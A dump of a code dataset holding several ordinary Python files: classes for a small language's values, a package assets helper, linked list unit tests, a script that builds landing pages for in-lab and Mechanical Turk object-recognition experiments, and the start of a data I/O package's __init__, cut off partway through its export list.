Dataset schema (pipe-delimited, one record per source file): hexsha, size, ext, lang; max_stars/max_issues/max_forks repo path, name, head hexsha, licenses, counts, and event min/max datetimes; the file content; and derived quality signals (avg_line_length, max_line_length, alphanum_fraction, the qsc_code_* and qsc_codepython_* metrics, effective, hits).
File: python/tokens.py | repo: santi/val-lang @ f00c6617edc3963ac92f93f356c4b49a6ea4f525 | license: MIT | size: 1,843 bytes | lang: Python | hexsha: 8577046198ef7d67a4858d95eb40b25945bfbb0b

class Value:
value = None
type = None
def __init__(self, value, type):
self.value = value
self.type = type
def __lt__(self, other):
if self.type != other.type:
raise ValueError(f"incompatible comparison between {self.type} and {other.type}")
return self.value < other.value
def __gt__(self, other):
if self.type != other.type:
raise ValueError(f"incompatible comparison between {self.type} and {other.type}")
return self.value > other.value
def __repr__(self):
return self.__str__()
def __str__(self):
return f"{str(self.type)}:{str(self.value)}"
class Field:
value = None
type = None
def __init__(self, value, type):
self.value = value
self.type = type
def __lt__(self, other):
if self.type != other.type:
raise ValueError(f"incompatible comparison between {self.type} and {other.type}")
return self.value < other.value
def __gt__(self, other):
if self.type != other.type:
raise ValueError(f"incompatible comparison between {self.type} and {other.type}")
return self.value > other.value
def __repr__(self):
return self.__str__()
def __str__(self):
return f"field:{str(self.value)}"
class Variable:
name = None
context = None
def __init__(self, name, context):
self.name = name
self.context = context
def __repr__(self):
return self.__str__()
def __str__(self):
return f"var:{self.name}"
def __getattr__(self, attr):
if attr == 'value':
return self.context[self.name].value
elif attr == 'type':
return self.context[self.name].type
else:
raise AttributeError(attr)
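
A brief usage sketch of the classes above. The copies here are trimmed and inlined (an assumption about packaging, since the record does not show how tokens.py is imported) so the sketch runs standalone; behavior mirrors the definitions above.

```python
# Trimmed, inlined copies of Value and Variable from tokens.py above,
# so this sketch is self-contained.

class Value:
    def __init__(self, value, type):
        self.value = value
        self.type = type

    def __lt__(self, other):
        if self.type != other.type:
            raise ValueError(f"incompatible comparison between {self.type} and {other.type}")
        return self.value < other.value

class Variable:
    def __init__(self, name, context):
        self.name = name
        self.context = context

    def __getattr__(self, attr):
        # Only invoked when normal attribute lookup fails, i.e. for
        # 'value' and 'type'; both resolve through the shared context dict.
        if attr == 'value':
            return self.context[self.name].value
        elif attr == 'type':
            return self.context[self.name].type
        raise AttributeError(attr)

ctx = {"x": Value(3, "int")}
x = Variable("x", ctx)
print(x.value, x.type)                     # 3 int
print(Value(1, "int") < Value(2, "int"))   # True

# Rebinding the name in the context is immediately visible through the
# Variable, because every lookup goes through the context dict.
ctx["x"] = Value(9, "int")
print(x.value)                             # 9
```

Note the design choice: a `Variable` stores no value of its own, so scopes can be modeled as plain dicts and rebinding never invalidates existing `Variable` handles.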
File: riptide_engine_docker/assets.py | repo: theCapypara/riptide-engine-docker @ 065eac0fcfe6d7de975082cabc9fb54ee1b1a422 | license: MIT | size: 126 bytes | lang: Python | hexsha: 8583418e6823e5804bb94eb3f07ca0323b6501bc | stars: 1 (2020-03-17) | issue events: 3 (2021-09-22 to 2022-01-05)

import pkg_resources
def riptide_engine_docker_assets_dir():
return pkg_resources.resource_filename(__name__, 'assets')
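
`pkg_resources.resource_filename` is deprecated in recent setuptools. A hedged sketch of the same lookup with the stdlib `importlib.resources` (assumes Python 3.9+; the function name here is illustrative, not from the repo):

```python
from importlib.resources import files

def package_assets_dir(package: str) -> str:
    # Resolve the 'assets' subdirectory of an installed package; mirrors
    # pkg_resources.resource_filename(package, 'assets'). The entry need
    # not exist on disk for the path to be formed.
    return str(files(package) / "assets")

# Demonstrated on a stdlib package purely so the sketch is runnable:
print(package_assets_dir("email"))
```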
File: tests/test_linked_lists.py | repo: rm21845/ctci @ 2b9d6fc13d51affbd01882b67277cf7c847a2c9c | license: MIT | size: 7,026 bytes | lang: Python | hexsha: 85a0f999658c9b10d5e1641c398f3666e48281ef

import unittest
from ctci.structs.linkedlist import Node, LinkedList, SinglyLinkedList, DoublyLinkedList
class TestNode(unittest.TestCase):
def setUp(self):
self.zero = Node(0)
self.one = Node(1)
self.two = Node(2)
def test_value(self):
self.assertEqual(self.zero.value, 0)
def test_next_node(self):
self.zero.next_node = self.one
self.assertEqual(self.zero.next_node, self.one)
def test_prev_node(self):
self.two.prev_node = self.one
self.assertEqual(self.two.prev_node, self.one)
class TestLinkedList(unittest.TestCase):
def setUp(self):
self.a = LinkedList()
def test_insert_zero(self):
self.a.insert(0)
self.assertEqual(self.a.head.value, 0)
def test_insert_one(self):
self.a.insert(1)
self.a.insert(2)
self.a.insert(4)
self.assertEqual(self.a.head.value, 4)
def test_len_empty(self):
self.assertEqual(len(self.a), 0)
def test_len_one(self):
self.a.insert(3)
self.a.insert(2)
self.assertEqual(len(self.a), 2)
def test_len_two(self):
self.a.insert(3)
self.a.insert(2)
self.a.insert(2)
self.a.insert(2)
self.a.insert(2)
self.a.insert(2)
self.assertEqual(len(self.a), 6)
def test_search_one(self):
self.a.insert(44)
found_node = self.a.search(44)
self.assertIsInstance(found_node, Node)
self.assertEqual(found_node.value, 44)
def test_search_two(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.insert(34)
self.a.insert(78)
found_node = self.a.search(78)
self.assertIsInstance(found_node, Node)
self.assertEqual(found_node.value, 78)
def test_search_three(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.insert(34)
self.a.insert(78)
found_node = self.a.search(67)
self.assertIsInstance(found_node, Node)
self.assertEqual(found_node.value, 67)
def test_search_no_exist(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.insert(34)
self.a.insert(78)
self.assertEqual(self.a.search(100), None)
def test_delete_zero(self):
self.a.insert(44)
self.a.delete(44)
self.assertEqual(self.a.search(66), None)
def test_delete_one(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.delete(66)
self.assertEqual(self.a.search(66), None)
def test_delete_two(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.delete(67)
self.assertEqual(self.a.search(67), None)
class TestSinglyLinkedList(unittest.TestCase):
def setUp(self):
self.a = SinglyLinkedList()
def test_len_empty(self):
self.assertEqual(len(self.a), 0)
def test_len_one(self):
self.a.insert(3)
self.a.insert(2)
self.assertEqual(len(self.a), 2)
def test_len_two(self):
self.a.insert(3)
self.a.insert(2)
self.a.insert(2)
self.a.insert(2)
self.a.insert(2)
self.a.insert(2)
self.assertEqual(len(self.a), 6)
def test_insert_zero(self):
self.a.insert(0)
self.assertEqual(self.a.head.value, 0)
def test_insert_one(self):
self.a.insert(1)
self.a.insert(2)
self.a.insert(4)
self.assertEqual(self.a.head.value, 4)
def test_search_one(self):
self.a.insert(44)
found_node = self.a.search(44)
self.assertIsInstance(found_node, Node)
self.assertEqual(found_node.value, 44)
def test_search_two(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.insert(34)
self.a.insert(78)
found_node = self.a.search(78)
self.assertIsInstance(found_node, Node)
self.assertEqual(found_node.value, 78)
def test_search_no_exist(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.insert(34)
self.a.insert(78)
self.assertEqual(self.a.search(100), None)
def test_delete_zero(self):
self.a.insert(44)
self.a.delete(44)
self.assertEqual(self.a.search(66), None)
def test_delete_one(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.delete(66)
self.assertEqual(self.a.search(66), None)
def test_delete_two(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.delete(67)
self.assertEqual(self.a.search(67), None)
class TestDoublyLinkedList(unittest.TestCase):
def setUp(self):
self.a = DoublyLinkedList()
def test_len_empty(self):
self.assertEqual(len(self.a), 0)
def test_len_one(self):
self.a.insert(3)
self.a.insert(2)
self.assertEqual(len(self.a), 2)
def test_len_two(self):
self.a.insert(3)
self.a.insert(2)
self.a.insert(2)
self.a.insert(2)
self.a.insert(2)
self.a.insert(2)
self.assertEqual(len(self.a), 6)
def test_insert_zero(self):
self.a.insert(0)
self.assertEqual(self.a.head.value, 0)
def test_insert_one(self):
self.a.insert(1)
self.a.insert(2)
self.a.insert(4)
self.assertEqual(self.a.head.value, 4)
def test_search_one(self):
self.a.insert(44)
found_node = self.a.search(44)
self.assertIsInstance(found_node, Node)
self.assertEqual(found_node.value, 44)
def test_search_two(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.insert(34)
self.a.insert(78)
found_node = self.a.search(78)
self.assertIsInstance(found_node, Node)
self.assertEqual(found_node.value, 78)
def test_search_no_exist(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.insert(34)
self.a.insert(78)
self.assertEqual(self.a.search(100), None)
def test_delete_zero(self):
self.a.insert(44)
self.a.delete(44)
self.assertEqual(self.a.search(66), None)
def test_delete_one(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.delete(66)
self.assertEqual(self.a.search(66), None)
def test_delete_two(self):
self.a.insert(44)
self.a.insert(66)
self.a.insert(67)
self.a.delete(67)
self.assertEqual(self.a.search(67), None)
if __name__ == '__main__':
    unittest.main()
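
The `ctci.structs.linkedlist` module under test is not included in this record. A minimal sketch of a head-insert list that would satisfy the shared insert/search/delete/len tests (an assumption; the repo's actual implementation may differ, e.g. in how the subclasses specialize):

```python
class Node:
    def __init__(self, value):
        self.value = value
        self.next_node = None
        self.prev_node = None

class LinkedList:
    def __init__(self):
        self.head = None

    def __len__(self):
        count, node = 0, self.head
        while node:
            count, node = count + 1, node.next_node
        return count

    def insert(self, value):
        # Head insertion: the most recently inserted value becomes head,
        # matching test_insert_one, which expects head.value == 4.
        node = Node(value)
        node.next_node = self.head
        self.head = node

    def search(self, value):
        node = self.head
        while node and node.value != value:
            node = node.next_node
        return node  # None when absent, as the tests expect

    def delete(self, value):
        node, prev = self.head, None
        while node and node.value != value:
            prev, node = node, node.next_node
        if node is None:
            return
        if prev is None:
            self.head = node.next_node
        else:
            prev.next_node = node.next_node

ll = LinkedList()
for v in (44, 66, 67):
    ll.insert(v)
print(len(ll), ll.head.value)   # 3 67
ll.delete(66)
print(ll.search(66))            # None
```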
File: user_utils/make_examples.py | repo: tdragoi/ptapreal @ e45244c3d551e916cdad930543261e41005358d9 | license: MIT | size: 21,491 bytes | lang: Python | hexsha: a458a9d22574c2c6821e02e4de871b7bc8094825

import construct_landing_page as c
from importlib import reload  # reload() is a builtin only in Python 2
reload(c)
SAVE_LOCATION = '../public/landing_pages/examples/'
def makeInLabMTS():
IMAGEBAGS = 'https://s3.amazonaws.com/milresources/ImageBagMetaDefinitions/MutatorTraining_FullVarWithBGSetA.json'
GAME = {'gameId':'example_inlab_MTS',
"periodicRewardIntervalMsec":60000,
"periodicRewardAmount":1,
"onFinish":"continue",
"randomSeed":'none',
}
TASK_SEQUENCE = [{
"taskType":"MTS",
"sampleBagNames":['FullVarWithBGSetA_batch0obj0', 'FullVarWithBGSetA_batch0obj1',
'FullVarWithBGSetA_batch0obj2'],
"fixationXCentroid":0.5,
"fixationYCentroid":0.8,
"fixationDiameterDegrees":3,
"sampleXCentroid":0.5,
"sampleYCentroid":0.5,
"sampleDiameterDegrees":8,
"actionXCentroid":[0.3, 0.7],
"actionYCentroid":[0.8, 0.8],
"actionDiameterDegrees":[6, 6],
"choiceXCentroid":[0.3, 0.7],
"choiceYCentroid":[0.8, 0.8],
"choiceDiameterDegrees":[4, 4],
"choiceMap":{"FullVarWithBGSetA_batch0obj0":"FullVarWithBGSetA_batch0obj0",
"FullVarWithBGSetA_batch0obj1":"FullVarWithBGSetA_batch0obj1",
'FullVarWithBGSetA_batch0obj2':"FullVarWithBGSetA_batch0obj2"},
"sampleOnMsec":200,
"sampleOffMsec":0,
"choiceTimeLimitMsec":5000,
"punishTimeOutMsec":100,
"punishStreakTimeOutMultiplier":1,
"rewardTimeOutMsec":150,
"probabilityRepeatWhenWrong":0,
"averageReturnCriterion":0.8,
"minTrialsCriterion":5,
"sampleSampleWithReplacement":True,
"drawEyeFixationDot":True
}]
ENVIRONMENT = {
'playspace_degreesVisualAngle':24,
'playspace_verticalOffsetInches':0,
'playspace_viewingDistanceInches':8,
'screen_virtualPixelsPerInch':143.755902965,
'primary_reinforcer_type':'juice',
'action_event_type':['mouseup', 'touchstart', 'touchmove'],
'rigEnvironment':'monkeybox',
"bonusUSDPerCorrect":0.0005,
"juiceRewardPer1000Trials":250,
}
SESSION_PACKAGE = {'GAME_PACKAGE':{'IMAGEBAGS':IMAGEBAGS, 'TASK_SEQUENCE':TASK_SEQUENCE, 'GAME':GAME},
'ENVIRONMENT':ENVIRONMENT}
c.write_landing_page(SESSION_PACKAGE, agentId = 'example_inlab_worker', landingPageName = 'landingPage_InlabMTS.html', saveDirectoryPath = SAVE_LOCATION)
return
def makeInLabSR():
sessionPackage = '/MonkeyTurk_upstairs/Subjects/exampleSR.json'
c.write_landing_page(sessionPackage, agentId = 'example_inlab_worker', landingPageName = 'landingPage_InlabSR.html', saveDirectoryPath = SAVE_LOCATION)
return
def makeMechanicalTurkSR():
IMAGEBAGS = {"stimulus_objectome_flute":["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_flute_e0aed0e2c3f0c3cb7a7e235bd931f193a536391d_ty-0.85987_tz-0.38018_rxy-36.131_rxz152.6439_ryz28.9932_s1.4314.png", "https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_flute_2012a31313faa422b2623460d0c33a9f5eb3b238_ty-0.33547_tz-0.0026731_rxy-38.2159_rxz-115.311_ryz90.0954_s1.3508.png"],
"token_objectome_flute": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome_tokens/images/objectomeTokens_objectome_flute.png"],
"stimulus_objectome_dog": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_dog_e1ed016de5e47e8a6567123ce134d72b7187db73_ty0.43294_tz-0.29943_rxy-112.6794_rxz75.5665_ryz127.211_s1.6328.png", "https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_dog_28ebb7db56691da21fa6d640f5ef719f916cb7ff_ty-0.48998_tz-0.20078_rxy-84.7937_rxz-117.8076_ryz175.5429_s1.3151.png"],
"token_objectome_dog": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome_tokens/images/objectomeTokens_objectome_dog.png"],
"token_objectome_pineapple": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome_tokens/images/objectomeTokens_objectome_pineapple.png"],
"stimulus_objectome_pineapple": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_pineapple_5946318bc2cdd1947534ae15d43aa7a0d820506e_ty-0.64759_tz0.33642_rxy-5.6836_rxz-71.4586_ryz62.4466_s1.169.png", "https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_pineapple_c50790daa826f1d3fbed5580820c6c91fdded273_ty-0.57074_tz0.84081_rxy-157.3224_rxz64.5421_ryz167.7568_s0.86084.png"]
}
GAME = {'gameId':'example_MechanicalTurk_SR',
"periodicRewardIntervalMsec":0,
"periodicRewardAmount":0,
"onFinish":"continue",
"minimumTrials":2,
"maximumTrials":800,
}
TASK_SEQUENCE = [{
"taskType":"SR",
"sampleBagNames":['stimulus_objectome_pineapple', 'stimulus_objectome_flute'],
"fixationXCentroid":0.5,
"fixationYCentroid":0.8,
"fixationDiameterDegrees":3,
"sampleXCentroid":0.5,
"sampleYCentroid":0.5,
"sampleDiameterDegrees":8,
"actionXCentroid":[0.3, 0.7],
"actionYCentroid":[0.8, 0.8],
"actionDiameterDegrees":[6, 6],
"choiceXCentroid":[0.3, 0.7],
"choiceYCentroid":[0.8, 0.8],
"choiceDiameterDegrees":[4, 4],
"rewardMap":{'stimulus_objectome_pineapple':[1, 0], 'stimulus_objectome_flute':[0, 1]},
"sampleOnMsec":200,
"sampleOffMsec":0,
"choiceTimeLimitMsec":5000,
"punishTimeOutMsec":400,
"punishStreakTimeOutMultiplier":1.2,
"rewardTimeOutMsec":150,
"probabilityRepeatWhenWrong":0,
"averageReturnCriterion":0.8,
"minTrialsCriterion":5,
"sampleSampleWithReplacement":False,
"drawEyeFixationDot":True
}]
GAME_PACKAGE = {'IMAGEBAGS':IMAGEBAGS, 'GAME':GAME, 'TASK_SEQUENCE':TASK_SEQUENCE}
ENVIRONMENT = {
'playspace_degreesVisualAngle':24,
'playspace_verticalOffsetInches':0,
'playspace_viewingDistanceInches':8,
'screen_virtualPixelsPerInch':143.755902965,
'primary_reinforcer_type':'monetary',
'action_event_type':['mouseup', 'touchstart', 'touchmove'],
'rigEnvironment':'mechanicalturk',
"bonusUSDPerCorrect":0.0005,
"juiceRewardPer1000Trials":250,
"instructionsDialogueString":"<ul><p><text style=\"font-weight:bold; font-size:large\">Thank you for your interest and contributing to research at at MIT!</text><pi><li>Please use the latest version of <b>Google Chrome</b> to work on this HIT. It may not work correctly on other browsers.<p><li>You will be presented with rapidly flashed images. <b>Your task is to figure out where to click on parts of the screen based on the information in the images.</b><p><li>The sound of a bell means you did something right, and received a small bonus reward.<p><li>Each trial begins with a <b>WHITE DOT</b>. Click the dot to begin the trial.<p><li>The HIT will submit <b>AUTOMATICALLY</b> after a certain number of trials. If the HIT freezes or does not submit, please contact us to resolve the issue and receive compensation for your time.<p><text style=\"color:#7A7A7A; font-size:smaller; font-style:italic\">If you cannot meet these requirements or if doing so could cause discomfort or injury, do not accept this HIT. You will not be penalized in any way.</text></ul>"
}
sessionPackage = {'GAME_PACKAGE':GAME_PACKAGE, 'ENVIRONMENT':ENVIRONMENT}
c.write_landing_page(sessionPackage, agentId = None, landingPageName = 'landingPage_MechanicalTurkSR.html', saveDirectoryPath = SAVE_LOCATION)
return
def makeMechanicalTurkMTS():
IMAGEBAGS = {"stimulus_objectome_flute":["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_flute_e0aed0e2c3f0c3cb7a7e235bd931f193a536391d_ty-0.85987_tz-0.38018_rxy-36.131_rxz152.6439_ryz28.9932_s1.4314.png", "https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_flute_2012a31313faa422b2623460d0c33a9f5eb3b238_ty-0.33547_tz-0.0026731_rxy-38.2159_rxz-115.311_ryz90.0954_s1.3508.png"],
"token_objectome_flute": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome_tokens/images/objectomeTokens_objectome_flute.png"],
"stimulus_objectome_dog": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_dog_e1ed016de5e47e8a6567123ce134d72b7187db73_ty0.43294_tz-0.29943_rxy-112.6794_rxz75.5665_ryz127.211_s1.6328.png", "https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_dog_28ebb7db56691da21fa6d640f5ef719f916cb7ff_ty-0.48998_tz-0.20078_rxy-84.7937_rxz-117.8076_ryz175.5429_s1.3151.png"],
"token_objectome_dog": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome_tokens/images/objectomeTokens_objectome_dog.png"],
"token_objectome_pineapple": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome_tokens/images/objectomeTokens_objectome_pineapple.png"],
"stimulus_objectome_pineapple": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_pineapple_5946318bc2cdd1947534ae15d43aa7a0d820506e_ty-0.64759_tz0.33642_rxy-5.6836_rxz-71.4586_ryz62.4466_s1.169.png", "https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_pineapple_c50790daa826f1d3fbed5580820c6c91fdded273_ty-0.57074_tz0.84081_rxy-157.3224_rxz64.5421_ryz167.7568_s0.86084.png"]
}
GAME = {'gameId':'example_MechanicalTurk_MTS',
"periodicRewardIntervalMsec":0,
"periodicRewardAmount":0,
"onFinish":"continue",
"minimumTrials":2,
"maximumTrials":800,
}
TASK_SEQUENCE = [{
"taskType":"MTS",
"sampleBagNames":['stimulus_objectome_pineapple', 'stimulus_objectome_flute'],
"fixationXCentroid":0.5,
"fixationYCentroid":0.8,
"fixationDiameterDegrees":3,
"sampleXCentroid":0.5,
"sampleYCentroid":0.5,
"sampleDiameterDegrees":8,
"actionXCentroid":[0.3, 0.7],
"actionYCentroid":[0.8, 0.8],
"actionDiameterDegrees":[6, 6],
"choiceXCentroid":[0.3, 0.7],
"choiceYCentroid":[0.8, 0.8],
"choiceDiameterDegrees":[4, 4],
"choiceMap":{"stimulus_objectome_flute":"token_objectome_flute",
"stimulus_objectome_pineapple":"token_objectome_pineapple",
'stimulus_objectome_dog':"token_objectome_dog"},
"sampleOnMsec":200,
"sampleOffMsec":0,
"choiceTimeLimitMsec":5000,
"punishTimeOutMsec":400,
"punishStreakTimeOutMultiplier":1.2,
"rewardTimeOutMsec":150,
"probabilityRepeatWhenWrong":0,
"averageReturnCriterion":0.8,
"minTrialsCriterion":5,
"sampleSampleWithReplacement":False,
"drawEyeFixationDot":True
}]
GAME_PACKAGE = {'IMAGEBAGS':IMAGEBAGS, 'GAME':GAME, 'TASK_SEQUENCE':TASK_SEQUENCE}
ENVIRONMENT = {
'playspace_degreesVisualAngle':24,
'playspace_verticalOffsetInches':0,
'playspace_viewingDistanceInches':8,
'screen_virtualPixelsPerInch':143.755902965,
'primary_reinforcer_type':'monetary',
'action_event_type':['mouseup', 'touchstart', 'touchmove'],
'rigEnvironment':'mechanicalturk',
"bonusUSDPerCorrect":0.0005,
"juiceRewardPer1000Trials":250,
"instructionsDialogueString":"<ul><p><text style=\"font-weight:bold; font-size:large\">Thank you for your interest and contributing to research at at MIT!</text><pi><li>Please use the latest version of <b>Google Chrome</b> to work on this HIT. It may not work correctly on other browsers.<p><li>You will be presented with rapidly flashed images. <b>Your task is to match images with the one that was rapidly flashed (this will become clear after you try a few trials).</b><p><li>The sound of a bell means you did something right, and received a small bonus reward.<p><li>Each trial begins with a <b>WHITE DOT</b>. Click the dot to begin the trial.<p><li>The HIT will submit <b>AUTOMATICALLY</b> after a certain number of trials. If the HIT freezes or does not submit, please contact us to resolve the issue and receive compensation for your time.<p><text style=\"color:#7A7A7A; font-size:smaller; font-style:italic\">If you cannot meet these requirements or if doing so could cause discomfort or injury, do not accept this HIT. You will not be penalized in any way.</text></ul>"
}
sessionPackage = {'GAME_PACKAGE':GAME_PACKAGE, 'ENVIRONMENT':ENVIRONMENT}
c.write_landing_page(sessionPackage, agentId = None, landingPageName = 'landingPage_MechanicalTurkMTS.html', saveDirectoryPath = SAVE_LOCATION)
return
def makeMechanicalTurkSwitcher():
IMAGEBAGS = {"stimulus_objectome_flute":["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_flute_e0aed0e2c3f0c3cb7a7e235bd931f193a536391d_ty-0.85987_tz-0.38018_rxy-36.131_rxz152.6439_ryz28.9932_s1.4314.png", "https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_flute_2012a31313faa422b2623460d0c33a9f5eb3b238_ty-0.33547_tz-0.0026731_rxy-38.2159_rxz-115.311_ryz90.0954_s1.3508.png"],
"token_objectome_flute": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome_tokens/images/objectomeTokens_objectome_flute.png"],
"stimulus_objectome_dog": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_dog_e1ed016de5e47e8a6567123ce134d72b7187db73_ty0.43294_tz-0.29943_rxy-112.6794_rxz75.5665_ryz127.211_s1.6328.png", "https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_dog_28ebb7db56691da21fa6d640f5ef719f916cb7ff_ty-0.48998_tz-0.20078_rxy-84.7937_rxz-117.8076_ryz175.5429_s1.3151.png"],
"token_objectome_dog": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome_tokens/images/objectomeTokens_objectome_dog.png"],
"token_objectome_pineapple": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome_tokens/images/objectomeTokens_objectome_pineapple.png"],
"stimulus_objectome_pineapple": ["https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_pineapple_5946318bc2cdd1947534ae15d43aa7a0d820506e_ty-0.64759_tz0.33642_rxy-5.6836_rxz-71.4586_ryz62.4466_s1.169.png", "https://s3.amazonaws.com/milresources/Images/MonkeyTurkSets/objectome/images/objectome_pineapple_c50790daa826f1d3fbed5580820c6c91fdded273_ty-0.57074_tz0.84081_rxy-157.3224_rxz64.5421_ryz167.7568_s0.86084.png"]
}
GAME = {'gameId':'example_MechanicalTurk_MTS_to_SR',
"periodicRewardIntervalMsec":0,
"periodicRewardAmount":0,
"onFinish":"loop",
"minimumTrials":30,
"maximumTrials":30,
}
TASK_SEQUENCE = [{
"taskType":"MTS",
"sampleBagNames":['stimulus_objectome_pineapple', 'stimulus_objectome_flute'],
"fixationXCentroid":0.5,
"fixationYCentroid":0.8,
"fixationDiameterDegrees":3,
"sampleXCentroid":0.5,
"sampleYCentroid":0.5,
"sampleDiameterDegrees":8,
"actionXCentroid":[0.3, 0.7],
"actionYCentroid":[0.8, 0.8],
"actionDiameterDegrees":[6, 6],
"choiceXCentroid":[0.3, 0.7],
"choiceYCentroid":[0.8, 0.8],
"choiceDiameterDegrees":[4, 4],
"choiceMap":{"stimulus_objectome_flute":"token_objectome_flute",
"stimulus_objectome_pineapple":"token_objectome_pineapple",
'stimulus_objectome_dog':"token_objectome_dog"},
"sampleOnMsec":200,
"sampleOffMsec":0,
"choiceTimeLimitMsec":5000,
"punishTimeOutMsec":400,
"punishStreakTimeOutMultiplier":1.2,
"rewardTimeOutMsec":150,
"probabilityRepeatWhenWrong":0,
"averageReturnCriterion":0.8,
"minTrialsCriterion":5,
"sampleSampleWithReplacement":False,
"drawEyeFixationDot":True
},
{
"taskType":"SR",
"sampleBagNames":['stimulus_objectome_pineapple', 'stimulus_objectome_flute'],
"fixationXCentroid":0.5,
"fixationYCentroid":0.8,
"fixationDiameterDegrees":3,
"sampleXCentroid":0.5,
"sampleYCentroid":0.5,
"sampleDiameterDegrees":8,
"actionXCentroid":[0.3, 0.7],
"actionYCentroid":[0.8, 0.8],
"actionDiameterDegrees":[6, 6],
"choiceXCentroid":[0.3, 0.7],
"choiceYCentroid":[0.8, 0.8],
"choiceDiameterDegrees":[4, 4],
"rewardMap":{"stimulus_objectome_flute":[0, 1],
"stimulus_objectome_pineapple":[1, 0]},
"sampleOnMsec":200,
"sampleOffMsec":0,
"choiceTimeLimitMsec":5000,
"punishTimeOutMsec":400,
"punishStreakTimeOutMultiplier":1.2,
"rewardTimeOutMsec":150,
"probabilityRepeatWhenWrong":0,
"averageReturnCriterion":0.8,
"minTrialsCriterion":5,
"sampleSampleWithReplacement":False,
"drawEyeFixationDot":True
}]
GAME_PACKAGE = {'IMAGEBAGS':IMAGEBAGS, 'GAME':GAME, 'TASK_SEQUENCE':TASK_SEQUENCE}
ENVIRONMENT = {
'playspace_degreesVisualAngle':24,
'playspace_verticalOffsetInches':0,
'playspace_viewingDistanceInches':8,
'screen_virtualPixelsPerInch':143.755902965,
'primary_reinforcer_type':'monetary',
'action_event_type':['mouseup', 'touchstart', 'touchmove'],
'rigEnvironment':'mechanicalturk',
"bonusUSDPerCorrect":0.0005,
"juiceRewardPer1000Trials":250,
"instructionsDialogueString":"<ul><p><text style=\"font-weight:bold; font-size:large\">Thank you for your interest and contributing to research at at MIT!</text><pi><li>Please use the latest version of <b>Google Chrome</b> to work on this HIT. It may not work correctly on other browsers.<p><li>You will be presented with rapidly flashed images. <b>Your task is to figure out where to click on parts of the screen based on the information in the images.</b><p><li>The sound of a bell means you did something right, and received a small bonus reward.<p><li>Each trial begins with a <b>WHITE DOT</b>. Click the dot to begin the trial.<p><li>The HIT will submit <b>AUTOMATICALLY</b> after a certain number of trials. If the HIT freezes or does not submit, please contact us to resolve the issue and receive compensation for your time.<p><text style=\"color:#7A7A7A; font-size:smaller; font-style:italic\">If you cannot meet these requirements or if doing so could cause discomfort or injury, do not accept this HIT. You will not be penalized in any way.</text></ul>"
}
sessionPackage = {'GAME_PACKAGE':GAME_PACKAGE, 'ENVIRONMENT':ENVIRONMENT}
c.write_landing_page(sessionPackage, agentId = None, landingPageName = 'landingPage_MechanicalTurkMTS_to_SR.html', saveDirectoryPath = SAVE_LOCATION)
return
if __name__ == '__main__':
makeInLabMTS()
makeInLabSR()
makeMechanicalTurkSR()
makeMechanicalTurkMTS()
makeMechanicalTurkSwitcher()
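The ENVIRONMENT dict above pins the playspace size in degrees of visual angle, alongside the viewing distance and the screen's pixel density; the on-screen extent in pixels follows from those three numbers. A minimal sketch of that conversion, using standard visual-angle geometry (the `playspace_pixels` helper is ours, not part of this script):

```python
import math

def playspace_pixels(degrees, viewing_distance_inches, pixels_per_inch):
    """On-screen size in pixels of a region spanning `degrees` of visual angle."""
    # Half-angle triangle: size = 2 * d * tan(theta / 2), then inches -> pixels.
    size_inches = 2 * viewing_distance_inches * math.tan(math.radians(degrees) / 2)
    return size_inches * pixels_per_inch

# Values taken from the ENVIRONMENT dict above.
px = playspace_pixels(24, 8, 143.755902965)  # roughly 489 pixels
```

This kind of check is useful for confirming the 24-degree playspace actually fits on a worker's screen at the assumed 8-inch viewing distance.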
# File: pyzzy/data/__init__.py (repo: krakozaure/pyzzy, license: MIT)

from .core import (
dump,
dump_conf,
dump_json,
dump_raw,
dump_toml,
dump_yaml,
load,
load_conf,
load_json,
load_raw,
load_toml,
load_yaml,
)
__all__ = [
"dump",
"dump_conf",
"dump_json",
"dump_raw",
"dump_toml",
"dump_yaml",
"load",
"load_conf",
"load_json",
"load_raw",
